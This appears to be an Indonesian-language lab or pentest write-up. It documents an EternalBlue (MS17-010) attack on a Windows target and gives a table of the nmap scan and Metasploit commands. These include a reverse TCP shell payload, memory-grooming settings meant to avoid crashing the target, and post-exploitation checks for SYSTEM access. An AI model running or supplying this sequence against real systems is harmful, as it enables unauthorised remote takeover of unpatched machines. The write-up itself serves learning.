Status Akhir: 🚀 EXPLOIT SUCCESSFUL | 👑 SYSTEM ACCESS GAINED

Scope: Scanning Critical Vulns, Troubleshooting Memory Instability (BSOD) & Remote Code Execution (RCE)

1. Analisis Keamanan (Concept)

2. Anatomi Serangan (Attack Vectors)

Penetrasi dilakukan pada target fisik dengan urutan sebagai berikut:

  1. Vulnerability Scanning: Menggunakan Nmap NSE Script untuk memastikan apakah port 445 memiliki celah MS17-010 yang aktif.
  2. Exploitation Phase: Mengirimkan payload melalui Metasploit untuk membajak proses sistem (lsass.exe atau spoolsv.exe).
  3. Privilege Escalation: Secara otomatis mendapatkan hak akses tertinggi (NT AUTHORITY\SYSTEM) karena exploit bekerja pada level kernel.

3. Strategi Manipulasi (Mental Models)

4. Detail Perintah Teknis (Command Breakdown)

Command Struktur (Subjek + Predikat + Objek) Penjelasan Logika
nmap -Pn -p 445 --script vuln [IP] nmap + No-Ping + Check Vuln Memastikan apakah pintu SMB target benar-benar memiliki celah EternalBlue.
msfconsole msf + console Membuka kerangka kerja Metasploit untuk memulai serangan.
use exploit/windows/smb/ms17_010_eternalblue use + nama modul Memilih modul eksploitasi spesifik untuk Windows 7/Server 2008.
set PAYLOAD windows/x64/shell/reverse_tcp set + payload ringan Menggunakan shell biasa agar target tidak crash (BSOD) akibat beban memori.
set EXITFUNC thread set + exit function Menginstruksikan exploit untuk menutup celah memori secara halus agar sistem tetap hidup.
set GROOMSIZE 5 set + alokasi memori Memperkecil jumlah data "grooming" di memori target untuk mencegah kegagalan sistem.
exploit exploit / run Menjalankan serangan ke IP target yang sudah dikonfigurasi.
whoami who + am + i Verifikasi identitas; jika muncul system, berarti kontrol penuh telah didapat.
type [file].txt type + nama file Perintah CMD Windows (setara cat di Linux) untuk membaca isi file teks.

Screenshot_2026-05-08_22_49_48.png

Screenshot_2026-05-08_23_26_45.png

Screenshot_2026-05-08_23_32_29.png